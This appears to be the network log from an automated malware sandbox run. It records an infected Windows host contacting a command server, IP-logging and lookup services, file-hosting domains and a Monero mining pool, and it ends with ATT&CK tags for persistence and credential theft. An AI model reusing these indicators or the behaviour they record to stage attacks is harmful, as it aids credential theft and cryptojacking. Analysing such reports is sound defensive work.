MicrosoftEdgeCP.exe

2.8kB
2.5kB
15
9

HTTP Request

POST https://www.facebook.com/ajax/bz?__a=1&__aaid=0&__ccg=EXCELLENT&__dyn=7xe6E5aQ1PyUbFuC1swgE98nwgU6C7UW3q327E2vwXw5ux60Vo1upE4W0OE2WxO2O1Vw8G1Qw5Mx61vw5zwwwi81nE1u83mwaS0zE5W0PU1AE17U2ZwrU19E36w&__hs=19660.BP%3ADEFAULT.2.0..0.0&__hsi=7295639733956011473&__req=3&__rev=1009557466&__s=%3A%3Are4buh&__spin_b=trunk&__spin_r=1009557466&__spin_t=1698648495&__user=0&dpr=1&jazoest=2874&lsd=AVq5u4P-QqE

HTTP Response

200
157.240.201.35:443

www.facebook.com

tls, http2

MicrosoftEdgeCP.exe

813 B
521 B
9
6
185.82.216.108:443

server5.statsexplorer.org

tls

csrss.exe

2.1kB
6.8kB
11
13
77.91.124.86:19084

FD8D.exe

156 B
3
77.91.124.86:19084

2lO462aT.exe

156 B
3
77.91.124.86:19084

FD8D.exe

156 B
3
77.91.124.86:19084

2lO462aT.exe

104 B
2

8.8.8.8:53

177.25.221.88.in-addr.arpa

dns

72 B
137 B
1
1

DNS Request

177.25.221.88.in-addr.arpa
8.8.8.8:53

29.68.91.77.in-addr.arpa

dns

70 B
107 B
1
1

DNS Request

29.68.91.77.in-addr.arpa
8.8.8.8:53

249.68.91.77.in-addr.arpa

dns

71 B
108 B
1
1

DNS Request

249.68.91.77.in-addr.arpa
8.8.8.8:53

73.255.233.193.in-addr.arpa

dns

73 B
110 B
1
1

DNS Request

73.255.233.193.in-addr.arpa
8.8.8.8:53

118.175.169.194.in-addr.arpa

dns

146 B
269 B
2
2

DNS Request

118.175.169.194.in-addr.arpa

DNS Request

170.34.67.172.in-addr.arpa
8.8.8.8:53

80.65.42.5.in-addr.arpa

dns

69 B
129 B
1
1

DNS Request

80.65.42.5.in-addr.arpa
8.8.8.8:53

1.124.91.77.in-addr.arpa

dns

70 B
83 B
1
1

DNS Request

1.124.91.77.in-addr.arpa
8.8.8.8:53

www.facebook.com

dns

MicrosoftEdgeCP.exe

62 B
107 B
1
1

DNS Request

www.facebook.com

DNS Response

157.240.201.35
8.8.8.8:53

accounts.google.com

dns

MicrosoftEdgeCP.exe

65 B
81 B
1
1

DNS Request

accounts.google.com

DNS Response

142.250.179.141
8.8.8.8:53

35.201.240.157.in-addr.arpa

dns

73 B
126 B
1
1

DNS Request

35.201.240.157.in-addr.arpa
8.8.8.8:53

store.steampowered.com

dns

MicrosoftEdge.exe

68 B
84 B
1
1

DNS Request

store.steampowered.com

DNS Response

104.85.0.101
8.8.8.8:53

141.179.250.142.in-addr.arpa

dns

74 B
113 B
1
1

DNS Request

141.179.250.142.in-addr.arpa
8.8.8.8:53

8.3.197.209.in-addr.arpa

dns

70 B
111 B
1
1

DNS Request

8.3.197.209.in-addr.arpa
8.8.8.8:53

twitter.com

dns

MicrosoftEdge.exe

57 B
121 B
1
1

DNS Request

twitter.com

DNS Response

104.244.42.1

104.244.42.129

104.244.42.193

104.244.42.65
8.8.8.8:53

steamcommunity.com

dns

MicrosoftEdge.exe

64 B
80 B
1
1

DNS Request

steamcommunity.com

DNS Response

23.207.106.113
8.8.8.8:53

101.0.85.104.in-addr.arpa

dns

71 B
135 B
1
1

DNS Request

101.0.85.104.in-addr.arpa
8.8.8.8:53

35.36.251.142.in-addr.arpa

dns

72 B
110 B
1
1

DNS Request

35.36.251.142.in-addr.arpa
8.8.8.8:53

1.42.244.104.in-addr.arpa

dns

71 B
71 B
1
1

DNS Request

1.42.244.104.in-addr.arpa
8.8.8.8:53

static.xx.fbcdn.net

dns

MicrosoftEdge.exe

65 B
104 B
1
1

DNS Request

static.xx.fbcdn.net

DNS Response

163.70.151.21
8.8.8.8:53

113.106.207.23.in-addr.arpa

dns

73 B
139 B
1
1

DNS Request

113.106.207.23.in-addr.arpa
8.8.8.8:53

21.151.70.163.in-addr.arpa

dns

72 B
116 B
1
1

DNS Request

21.151.70.163.in-addr.arpa
8.8.8.8:53

www.epicgames.com

dns

MicrosoftEdgeCP.exe

63 B
205 B
1
1

DNS Request

www.epicgames.com

DNS Response

44.216.163.13

18.233.1.119

18.232.241.205

44.218.16.179

50.16.182.203

34.237.225.45

34.197.99.40

54.221.225.92
8.8.8.8:53

www.paypal.com

dns

MicrosoftEdgeCP.exe

60 B
134 B
1
1

DNS Request

www.paypal.com

DNS Response

192.229.221.25
8.8.8.8:53

store.cloudflare.steamstatic.com

dns

MicrosoftEdgeCP.exe

78 B
110 B
1
1

DNS Request

store.cloudflare.steamstatic.com

DNS Response

172.64.145.151

104.18.42.105
8.8.8.8:53

151.145.64.172.in-addr.arpa

dns

73 B
135 B
1
1

DNS Request

151.145.64.172.in-addr.arpa
8.8.8.8:53

community.cloudflare.steamstatic.com

dns

MicrosoftEdgeCP.exe

82 B
114 B
1
1

DNS Request

community.cloudflare.steamstatic.com

DNS Response

172.64.145.151

104.18.42.105
8.8.8.8:53

abs.twimg.com

dns

MicrosoftEdgeCP.exe

59 B
114 B
1
1

DNS Request

abs.twimg.com

DNS Response

152.199.21.141
8.8.8.8:53

141.21.199.152.in-addr.arpa

dns

73 B
144 B
1
1

DNS Request

141.21.199.152.in-addr.arpa
8.8.8.8:53

facebook.com

dns

MicrosoftEdgeCP.exe

58 B
74 B
1
1

DNS Request

facebook.com

DNS Response

163.70.151.35
8.8.8.8:53

25.221.229.192.in-addr.arpa

dns

73 B
144 B
1
1

DNS Request

25.221.229.192.in-addr.arpa
8.8.8.8:53

35.151.70.163.in-addr.arpa

dns

72 B
125 B
1
1

DNS Request

35.151.70.163.in-addr.arpa
8.8.8.8:53

71.124.91.77.in-addr.arpa

dns

71 B
84 B
1
1

DNS Request

71.124.91.77.in-addr.arpa
8.8.8.8:53

13.163.216.44.in-addr.arpa

dns

72 B
127 B
1
1

DNS Request

13.163.216.44.in-addr.arpa
8.8.8.8:53

iplogger.com

dns

kos4.exe

58 B
74 B
1
1

DNS Request

iplogger.com

DNS Response

148.251.234.93
8.8.8.8:53

stim.graspalace.com

dns

kos4.exe

65 B
97 B
1
1

DNS Request

stim.graspalace.com

DNS Response

188.114.97.0

188.114.96.0
8.8.8.8:53

93.234.251.148.in-addr.arpa

dns

73 B
99 B
1
1

DNS Request

93.234.251.148.in-addr.arpa
8.8.8.8:53

0.97.114.188.in-addr.arpa

dns

71 B
133 B
1
1

DNS Request

0.97.114.188.in-addr.arpa
8.8.8.8:53

14.15.239.18.in-addr.arpa

dns

71 B
127 B
1
1

DNS Request

14.15.239.18.in-addr.arpa
8.8.8.8:53

fbcdn.net

dns

MicrosoftEdgeCP.exe

126 B
187 B
2
2

DNS Request

fbcdn.net

DNS Response

163.70.151.35

DNS Request

1.202.248.87.in-addr.arpa
8.8.8.8:53

ocsp.r2m02.amazontrust.com

dns

MicrosoftEdgeCP.exe

72 B
88 B
1
1

DNS Request

ocsp.r2m02.amazontrust.com

DNS Response

18.238.246.206
8.8.8.8:53

fbsbx.com

dns

MicrosoftEdgeCP.exe

55 B
71 B
1
1

DNS Request

fbsbx.com

DNS Response

163.70.151.35
8.8.8.8:53

80.41.65.18.in-addr.arpa

dns

140 B
248 B
2
2

DNS Request

80.41.65.18.in-addr.arpa

DNS Request

80.41.65.18.in-addr.arpa
8.8.8.8:53

206.246.238.18.in-addr.arpa

dns

146 B
262 B
2
2

DNS Request

206.246.238.18.in-addr.arpa

DNS Request

206.246.238.18.in-addr.arpa
8.8.8.8:53

213.28.22.171.in-addr.arpa

dns

72 B
133 B
1
1

DNS Request

213.28.22.171.in-addr.arpa
8.8.8.8:53

twitter.com

dns

MicrosoftEdge.exe

57 B
73 B
1
1

DNS Request

twitter.com

DNS Response

104.244.42.129
8.8.8.8:53

129.42.244.104.in-addr.arpa

dns

73 B
73 B
1
1

DNS Request

129.42.244.104.in-addr.arpa
8.8.8.8:53

18.175.53.84.in-addr.arpa

dns

71 B
135 B
1
1

DNS Request

18.175.53.84.in-addr.arpa
8.8.8.8:53

www.paypalobjects.com

dns

MicrosoftEdgeCP.exe

67 B
148 B
1
1

DNS Request

www.paypalobjects.com

DNS Response

192.229.221.25
8.8.8.8:53

static-assets-prod.unrealengine.com

dns

MicrosoftEdge.exe

81 B
188 B
1
1

DNS Request

static-assets-prod.unrealengine.com

DNS Response

18.239.36.22

18.239.36.105

18.239.36.73

18.239.36.103
8.8.8.8:53

tracking.epicgames.com

dns

MicrosoftEdgeCP.exe

68 B
186 B
1
1

DNS Request

tracking.epicgames.com

DNS Response

52.20.186.151

54.166.243.177

3.93.123.75
8.8.8.8:53

0.159.190.20.in-addr.arpa

dns

71 B
157 B
1
1

DNS Request

0.159.190.20.in-addr.arpa
8.8.8.8:53

22.36.239.18.in-addr.arpa

dns

71 B
127 B
1
1

DNS Request

22.36.239.18.in-addr.arpa
8.8.8.8:53

watson.telemetry.microsoft.com

dns

137 B
459 B
2
2

DNS Request

watson.telemetry.microsoft.com

DNS Response

20.189.173.22

DNS Request

www.youtube.com

DNS Response

142.251.36.14

142.251.39.110

172.217.168.206

172.217.23.206

216.58.208.110

216.58.214.14

142.250.179.142

142.251.36.46

142.250.179.174

142.250.179.206
8.8.8.8:53

14.36.251.142.in-addr.arpa

dns

72 B
111 B
1
1

DNS Request

14.36.251.142.in-addr.arpa
8.8.8.8:53

151.186.20.52.in-addr.arpa

dns

72 B
127 B
1
1

DNS Request

151.186.20.52.in-addr.arpa
8.8.8.8:53

www.recaptcha.net

dns

MicrosoftEdgeCP.exe

63 B
79 B
1
1

DNS Request

www.recaptcha.net

DNS Response

142.250.179.163
8.8.8.8:53

i.ytimg.com

dns

MicrosoftEdgeCP.exe

57 B
217 B
1
1

DNS Request

i.ytimg.com

DNS Response

142.250.179.182

142.250.179.214

142.251.36.22

142.251.39.118

172.217.168.214

172.217.23.214

216.58.208.118

142.250.179.150

142.251.36.54

172.217.168.246
8.8.8.8:53

22.173.189.20.in-addr.arpa

dns

72 B
158 B
1
1

DNS Request

22.173.189.20.in-addr.arpa
8.8.8.8:53

163.179.250.142.in-addr.arpa

dns

74 B
112 B
1
1

DNS Request

163.179.250.142.in-addr.arpa
8.8.8.8:53

182.179.250.142.in-addr.arpa

dns

74 B
113 B
1
1

DNS Request

182.179.250.142.in-addr.arpa
8.8.8.8:53

195.179.250.142.in-addr.arpa

dns

74 B
112 B
1
1

DNS Request

195.179.250.142.in-addr.arpa
8.8.8.8:53

106.208.58.216.in-addr.arpa

dns

73 B
143 B
1
1

DNS Request

106.208.58.216.in-addr.arpa
8.8.8.8:53

zn1ynnliufrct75cb-paypalxm.siteintercept.qualtrics.com

dns

MicrosoftEdgeCP.exe

100 B
234 B
1
1

DNS Request

zn1ynnliufrct75cb-paypalxm.siteintercept.qualtrics.com

DNS Response

104.17.209.240

104.17.208.240
8.8.8.8:53

steamcommunity.com

dns

MicrosoftEdge.exe

64 B
80 B
1
1

DNS Request

steamcommunity.com

DNS Response

23.207.106.113
8.8.8.8:53

240.209.17.104.in-addr.arpa

dns

146 B
270 B
2
2

DNS Request

240.209.17.104.in-addr.arpa

DNS Request

240.209.17.104.in-addr.arpa
8.8.8.8:53

store.steampowered.com

dns

MicrosoftEdge.exe

68 B
84 B
1
1

DNS Request

store.steampowered.com

DNS Response

104.85.0.101
8.8.8.8:53

14.227.111.52.in-addr.arpa

dns

72 B
158 B
1
1

DNS Request

14.227.111.52.in-addr.arpa
8.8.8.8:53

talon-website-prod.ecosec.on.epicgames.com

dns

MicrosoftEdgeCP.exe

88 B
195 B
1
1

DNS Request

talon-website-prod.ecosec.on.epicgames.com

DNS Response

172.64.146.120

104.18.41.136
8.8.8.8:53

120.146.64.172.in-addr.arpa

dns

73 B
135 B
1
1

DNS Request

120.146.64.172.in-addr.arpa
8.8.8.8:53

api.steampowered.com

dns

MicrosoftEdgeCP.exe

66 B
82 B
1
1

DNS Request

api.steampowered.com

DNS Response

23.207.106.113
8.8.8.8:53

crl.rootca1.amazontrust.com

dns

MicrosoftEdge.exe

73 B
137 B
1
1

DNS Request

crl.rootca1.amazontrust.com

DNS Response

18.65.40.94

18.65.40.199

18.65.40.98

18.65.40.48
8.8.8.8:53

94.40.65.18.in-addr.arpa

dns

70 B
124 B
1
1

DNS Request

94.40.65.18.in-addr.arpa
8.8.8.8:53

talon-service-prod.ecosec.on.epicgames.com

dns

MicrosoftEdgeCP.exe

88 B
195 B
1
1

DNS Request

talon-service-prod.ecosec.on.epicgames.com

DNS Response

172.64.146.120

104.18.41.136
8.8.8.8:53

js.hcaptcha.com

dns

MicrosoftEdgeCP.exe

61 B
93 B
1
1

DNS Request

js.hcaptcha.com

DNS Response

104.19.219.90

104.19.218.90
8.8.8.8:53

t.paypal.com

dns

MicrosoftEdgeCP.exe

58 B
130 B
1
1

DNS Request

t.paypal.com

DNS Response

192.229.221.25
8.8.8.8:53

90.219.19.104.in-addr.arpa

dns

72 B
134 B
1
1

DNS Request

90.219.19.104.in-addr.arpa
8.8.8.8:53

newassets.hcaptcha.com

dns

MicrosoftEdgeCP.exe

68 B
100 B
1
1

DNS Request

newassets.hcaptcha.com

DNS Response

104.19.218.90

104.19.219.90
8.8.8.8:53

171.62.40.149.in-addr.arpa

dns

72 B
118 B
1
1

DNS Request

171.62.40.149.in-addr.arpa
8.8.8.8:53

200.197.79.204.in-addr.arpa

dns

73 B
106 B
1
1

DNS Request

200.197.79.204.in-addr.arpa
8.8.8.8:53

90.218.19.104.in-addr.arpa

dns

72 B
134 B
1
1

DNS Request

90.218.19.104.in-addr.arpa
8.8.8.8:53

161.19.199.152.in-addr.arpa

dns

73 B
144 B
1
1

DNS Request

161.19.199.152.in-addr.arpa
8.8.8.8:53

api.ipify.org

dns

2D8A.exe

59 B
126 B
1
1

DNS Request

api.ipify.org

DNS Response

173.231.16.77

64.185.227.156

104.237.62.212
8.8.8.8:53

77.16.231.173.in-addr.arpa

dns

72 B
99 B
1
1

DNS Request

77.16.231.173.in-addr.arpa
8.8.8.8:53

11.94.49.194.in-addr.arpa

dns

71 B
131 B
1
1

DNS Request

11.94.49.194.in-addr.arpa
8.8.8.8:53

host-file-host6.com

dns

Explorer.EXE

65 B
138 B
1
1

DNS Request

host-file-host6.com
8.8.8.8:53

host-host-file8.com

dns

Explorer.EXE

130 B
162 B
2
2

DNS Request

host-host-file8.com

DNS Response

95.214.26.28

DNS Request

host-host-file8.com

DNS Response

95.214.26.28
8.8.8.8:53

23.149.64.172.in-addr.arpa

dns

72 B
134 B
1
1

DNS Request

23.149.64.172.in-addr.arpa
8.8.8.8:53

28.26.214.95.in-addr.arpa

dns

71 B
132 B
1
1

DNS Request

28.26.214.95.in-addr.arpa
8.8.8.8:53

hcaptcha.com

dns

MicrosoftEdgeCP.exe

58 B
90 B
1
1

DNS Request

hcaptcha.com

DNS Response

104.19.219.90

104.19.218.90
8.8.8.8:53

233.38.18.104.in-addr.arpa

dns

72 B
134 B
1
1

DNS Request

233.38.18.104.in-addr.arpa
8.8.8.8:53

api.ip.sb

dns

2FDC.exe

55 B
145 B
1
1

DNS Request

api.ip.sb

DNS Response

104.26.12.31

104.26.13.31

172.67.75.172
8.8.8.8:53

31.12.26.104.in-addr.arpa

dns

71 B
133 B
1
1

DNS Request

31.12.26.104.in-addr.arpa
8.8.8.8:53

164.169.70.146.in-addr.arpa

dns

73 B
102 B
1
1

DNS Request

164.169.70.146.in-addr.arpa
8.8.8.8:53

i.ytimg.com

dns

MicrosoftEdgeCP.exe

57 B
217 B
1
1

DNS Request

i.ytimg.com

DNS Response

142.251.39.118

172.217.168.214

172.217.23.214

216.58.214.22

142.250.179.150

142.251.36.54

172.217.168.246

142.250.179.182

142.250.179.214

142.251.36.22
8.8.8.8:53

118.39.251.142.in-addr.arpa

dns

73 B
112 B
1
1

DNS Request

118.39.251.142.in-addr.arpa
8.8.8.8:53

84.65.42.20.in-addr.arpa

dns

70 B
156 B
1
1

DNS Request

84.65.42.20.in-addr.arpa
8.8.8.8:53

accounts.google.com

dns

MicrosoftEdgeCP.exe

65 B
81 B
1
1

DNS Request

accounts.google.com

DNS Response

142.250.179.141
8.8.8.8:53

www.paypal.com

dns

MicrosoftEdgeCP.exe

60 B
134 B
1
1

DNS Request

www.paypal.com

DNS Response

192.229.221.25
8.8.8.8:53

www.paypalobjects.com

dns

MicrosoftEdgeCP.exe

67 B
148 B
1
1

DNS Request

www.paypalobjects.com

DNS Response

192.229.221.25
8.8.8.8:53

www.recaptcha.net

dns

MicrosoftEdgeCP.exe

63 B
79 B
1
1

DNS Request

www.recaptcha.net

DNS Response

142.250.179.163
8.8.8.8:53

zn1ynnliufrct75cb-paypalxm.siteintercept.qualtrics.com

dns

MicrosoftEdgeCP.exe

200 B
234 B
2
1

DNS Request

zn1ynnliufrct75cb-paypalxm.siteintercept.qualtrics.com

DNS Request

zn1ynnliufrct75cb-paypalxm.siteintercept.qualtrics.com

DNS Response

104.17.209.240

104.17.208.240
8.8.8.8:53

t.paypal.com

dns

MicrosoftEdgeCP.exe

58 B
130 B
1
1

DNS Request

t.paypal.com

DNS Response

192.229.221.25
8.8.8.8:53

7d9c5bb8-f228-41b5-97ed-124b5722e850.uuid.statsexplorer.org

dns

csrss.exe

105 B
166 B
1
1

DNS Request

7d9c5bb8-f228-41b5-97ed-124b5722e850.uuid.statsexplorer.org
8.8.8.8:53

98.142.81.104.in-addr.arpa

dns

72 B
137 B
1
1

DNS Request

98.142.81.104.in-addr.arpa
8.8.8.8:53

www.microsoft.com

dns

MicrosoftEdge.exe

63 B
230 B
1
1

DNS Request

www.microsoft.com

DNS Response

104.85.1.163
8.8.8.8:53

163.1.85.104.in-addr.arpa

dns

71 B
135 B
1
1

DNS Request

163.1.85.104.in-addr.arpa
8.8.8.8:53

235.175.169.194.in-addr.arpa

dns

74 B
135 B
1
1

DNS Request

235.175.169.194.in-addr.arpa
8.8.8.8:53

cdn.discordapp.com

dns

csrss.exe

64 B
144 B
1
1

DNS Request

cdn.discordapp.com

DNS Response

162.159.133.233

162.159.135.233

162.159.130.233

162.159.134.233

162.159.129.233
8.8.8.8:53

stun3.l.google.com

dns

csrss.exe

64 B
80 B
1
1

DNS Request

stun3.l.google.com

DNS Response

74.125.24.127
8.8.8.8:53

server5.statsexplorer.org

dns

csrss.exe

71 B
87 B
1
1

DNS Request

server5.statsexplorer.org

DNS Response

185.82.216.108
74.125.24.127:19302

stun3.l.google.com

csrss.exe

96 B
120 B
2
2
8.8.8.8:53

127.24.125.74.in-addr.arpa

dns

72 B
106 B
1
1

DNS Request

127.24.125.74.in-addr.arpa
8.8.8.8:53

walkinglate.com

dns

csrss.exe

61 B
93 B
1
1

DNS Request

walkinglate.com

DNS Response

188.114.97.0

188.114.96.0
8.8.8.8:53

233.133.159.162.in-addr.arpa

dns

74 B
136 B
1
1

DNS Request

233.133.159.162.in-addr.arpa
8.8.8.8:53

108.216.82.185.in-addr.arpa

dns

73 B
136 B
1
1

DNS Request

108.216.82.185.in-addr.arpa
8.8.8.8:53

xmr-eu1.nanopool.org

dns

explorer.exe

66 B
210 B
1
1

DNS Request

xmr-eu1.nanopool.org

DNS Response

163.172.154.142

51.15.65.182

212.47.253.124

51.15.193.130

51.255.34.118

51.15.58.224

51.68.190.80

135.125.238.108

51.68.143.81
8.8.8.8:53

pastebin.com

dns

explorer.exe

58 B
106 B
1
1

DNS Request

pastebin.com

DNS Response

172.67.34.170

104.20.68.143

104.20.67.143
8.8.8.8:53

224.58.15.51.in-addr.arpa

dns

71 B
117 B
1
1

DNS Request

224.58.15.51.in-addr.arpa
8.8.8.8:53

80.190.68.51.in-addr.arpa

dns

71 B
109 B
1
1

DNS Request

80.190.68.51.in-addr.arpa
8.8.8.8:53

stun1.l.google.com

dns

f801950a962ddba14caaa44bf084b55c.exe

64 B
80 B
1
1

DNS Request

stun1.l.google.com

DNS Response

142.251.125.127
142.251.125.127:19302

stun1.l.google.com

f801950a962ddba14caaa44bf084b55c.exe

48 B
60 B
1
1
8.8.8.8:53

127.125.251.142.in-addr.arpa

dns

74 B
108 B
1
1

DNS Request

127.125.251.142.in-addr.arpa

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Scheduled Task/Job

Persistence

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Create or Modify System Process

T1543

Windows Service

Scheduled Task/Job

Privilege Escalation

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Create or Modify System Process

T1543

Windows Service

Scheduled Task/Job

Defense Evasion

Impair Defenses

T1562

Disable or Modify Tools

Modify Registry

Credential Access

Unsecured Credentials

T1552

Credentials In Files

T1552.001

Discovery

Peripheral Device Discovery

T1120

Query Registry

T1012

System Information Discovery